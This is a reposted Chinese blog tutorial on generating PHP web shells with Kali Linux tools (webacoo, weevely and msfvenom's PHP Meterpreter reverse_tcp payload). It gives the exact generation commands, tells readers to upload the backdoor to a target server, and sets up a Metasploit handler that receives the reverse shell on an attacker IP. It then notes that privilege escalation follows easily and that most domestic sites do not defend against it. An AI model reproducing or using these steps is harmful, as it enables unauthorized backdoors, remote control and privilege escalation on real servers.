很多時候在滲透測試時選擇web木馬害怕用的别人的馬帶有後門,這樣自己的辛苦就要被别人不勞而獲,很多時候我們都想擁有自己的馬,那麼這個時候你就應該使用kail來生成一個自己獨特密碼的web木馬了。
Kali Linux自帶有好幾個web木馬生成工具,下面我們來簡單看幾個:
1.webacoo後門
webacoo -g -o test.php
-g 制作後門代碼
-o 輸出生成指定的後門程式檔案名
<a href="http://s2.51cto.com/wyfs02/M02/77/3C/wKioL1Zli82gQMVfAAAu6riv1A0061.png" target="_blank"></a>
把web後門上傳到目标伺服器後
使用kali linux通路如下
注意:上傳的路徑一定要正确
最後退出的時候使用exit退出
2.weevely
檢視幫助資訊
<a href="http://s4.51cto.com/wyfs02/M00/77/3C/wKioL1Zli8-BvBjMAAAk1biLZUM186.png" target="_blank"></a>
生成後門
下列指令可以生産混攪PHP backdoor , 密碼password 後門名字disaplay.php
weevely generate password disaplay.php
<a href="http://s1.51cto.com/wyfs02/M01/77/3C/wKioL1Zli9CTIbX0AAAzLMyt8MA048.png" target="_blank"></a>
把後門檔案上傳到伺服器後,如下指令可以成功通路
通過help看到weevely有很多的module
.net.ifaces 檢視伺服器的端口資訊
.net.scan 202.205.xx.xx 22 對伺服器某個端口掃描
3.PHP Meterpreter
metasploit有一個名為PHP Meterpreter的payload,可建立具有meterpreter功能的PHP webshell。
Metasploit的msfvenom工具可以制作PHP Meterpreter,指令如下:
msfvenom -p php/meterpreter/reverse_tcp LHOST=自己監聽的IP -f raw > php_meter.php
-p 設定payload
-f 設定輸出檔案格式
<a href="http://s4.51cto.com/wyfs02/M01/77/3C/wKioL1Zli8-QE6pRAAAcwP6E-4M289.png" target="_blank"></a>
<a href="http://s4.51cto.com/wyfs02/M01/77/3E/wKiom1Zli2DRN9KlAAAl3u1nWKs170.png" target="_blank"></a>
但是使用前需要注意生成檔案的第一行被注釋了,是以需要把注釋去掉才能使用
把webshell上傳到目标伺服器,本地監聽打開如下:
啟動msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 202.205.7.162
<a href="http://s5.51cto.com/wyfs02/M00/77/3E/wKiom1Zli1_xIK6FAAAtU0mx_E0849.png" target="_blank"></a>
然後我們就可以使用kali的metasploit功能對目标伺服器進行一系列操作。
這種WEBSHELL 利用起來相當友善,輸入shell指令之後,就可以随便提權什麼的了.
1,國内的貌似沒有防護這塊的,國内大多隻防護GET POST COOKIE這些資料.
2,缺點是如果伺服器在DMZ,則失效.
3,more what ..... 這種shell如果被利用多了,肯定會有硬體廠商去做防護的.
本文轉自Tar0 51CTO部落格,原文連結:http://blog.51cto.com/tar0cissp/1720542,如需轉載請自行聯系原作者